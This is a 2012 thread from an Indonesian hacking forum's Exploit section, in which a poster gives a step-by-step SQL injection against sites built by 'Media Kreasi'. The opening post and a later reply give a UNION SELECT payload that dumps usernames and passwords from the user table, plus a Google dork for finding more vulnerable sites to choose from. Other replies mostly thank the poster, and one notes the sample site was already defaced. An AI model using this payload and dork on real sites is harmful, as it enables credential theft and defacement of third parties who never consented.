Devilzc0de Forum
[Tutor] Penerapan SQL Injecton pada "Media Kreasi" - Printable Version

+- Devilzc0de Forum (http://devilzc0de.org/forum)
+-- Forum: Information Technology (/forum-8.html)
+--- Forum: Hacking (/forum-12.html)
+---- Forum: Exploit (/forum-27.html)
+---- Thread: [Tutor] Penerapan SQL Injecton pada "Media Kreasi" (/thread-15453.html)

Pages: 1 2 3


Penerapan SQL Injecton pada "Media Kreasi" - momodrock - 06-10-2012 08:46 PM

Penerapan SQL Injecton pada "Media Kreasi"


ini jg sbnarx tutor cupu yg cuma untuk org sperti ane,. mewek
tp cuma iseng2 mau ngetik2, jd bkin trit aja deh.. ngakak

exploit
target:
http://******/products/category/?id=13' <-- Vuln

disini kita tdk usah cari tahu isi table and column,
lgsung saja ketawa
cukup tambahkan "-" stelah "="
http://******/products/category/?id=-13
kmudian masukkan cheat.x hmmhmm
Quote:union select 1,group_concat(nama_user,0xa,pass),3,4,5 from tbl_user--
jadinya sprti ini:
Quote:http://******/products/category/?id=-13 union select 1,group_concat(nama_user,0xa,pass),3,4,5 from tbl_user--

udah gitu aja,..
tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi"

terserah mau plih target manapun..
cheat.x sama aja ngakak ngakak

sekian...
ngamuk jgn di depes, cukup beritahu admin web.x aja.. angel2


RE: Penerapan SQL Injecton pada "Media Kreasi" - anbu - 06-10-2012 09:44 PM

maaf om ane edit yah webnya ane hide

udah ada yang deface itu hammer latah banget


RE: Penerapan SQL Injecton pada "Media Kreasi" - genta - 06-10-2012 09:52 PM

cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2ybingung ama tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa bingung

maaf bila nanya nya oot bener ne om mohon .........ijin belajar mohon


RE: Penerapan SQL Injecton pada "Media Kreasi" - tabun - 06-10-2012 09:52 PM

keren jga.. mantap
ati2 tar ada singel defacer yg depes.. detektif


RE: Penerapan SQL Injecton pada "Media Kreasi" - anharku - 06-10-2012 09:59 PM

hm... lumayan buat belajar SQLi belajar


RE: Penerapan SQL Injecton pada "Media Kreasi" - momodrock - 06-10-2012 10:17 PM

(06-10-2012 09:44 PM)anbu Wrote:  maaf om ane edit yah webnya ane hide

udah ada yang deface itu hammer latah banget
iah om.. seneng thx

(06-10-2012 09:52 PM)genta Wrote:  cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2ybingung ama tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa bingung

maaf bila nanya nya oot bener ne om mohon .........ijin belajar mohon
ane jg kurang ngerti cara nulis om.. hmm
mgkn sprti ini:
tambahkan tanda kurang/mines
Quote:-
di depan id artikel,.. misal: http://www.hikz.com/blabla?id=34
jadix sprti ini, http://www.hikz.com/blabla?id=-34 ketawa

cari target (website) pake dork:
Quote:intext:"All rights reserved. - By Media Kreasi"

tiggal paste di gogel aja om
setelah dpt target, lanjut aja langkah2 di atas.. seneng
@[tabun]
iahh, udah di antisipasi duluan sama om anbu seneng
@[anharku] silahkan senior


RE: Penerapan SQL Injecton pada "Media Kreasi" - genta - 06-10-2012 10:21 PM

(06-10-2012 10:17 PM)momodrock Wrote:  
(06-10-2012 09:44 PM)anbu Wrote:  maaf om ane edit yah webnya ane hide

udah ada yang deface itu hammer latah banget
iah om.. seneng thx

(06-10-2012 09:52 PM)genta Wrote:  cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2ybingung ama tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa bingung

maaf bila nanya nya oot bener ne om mohon .........ijin belajar mohon
ane jg kurang ngerti cara nulis om.. hmm
mgkn sprti ini:
tambahkan tanda kurang/mines
Quote:-
di depan id artikel,.. misal: http://www.hikz.com/blabla?id=34
jadix sprti ini, http://www.hikz.com/blabla?id=-34 ketawa

cari target (website) pake dork:
Quote:intext:"All rights reserved. - By Media Kreasi"

tiggal paste di gogel aja om
setelah dpt target, lanjut aja langkah2 di atas.. seneng
ane emank bener2 gak tau om nangis ,,,ama ane ini bukan heker om nohope..........ijin pelajari dulu om belajar


RE: Penerapan SQL Injecton pada "Media Kreasi" - ToNhoW - 06-10-2012 10:34 PM

yang pepes pasti maho ngakak


RE: Penerapan SQL Injecton pada "Media Kreasi" - Eyang Subur - 06-10-2012 11:41 PM

buat TS, ane kasih jempol deh mantap


RE: Penerapan SQL Injecton pada "Media Kreasi" - ditatompel - 06-11-2012 02:38 AM

Thanks omz.. Ijin pelajari dulu.. belajar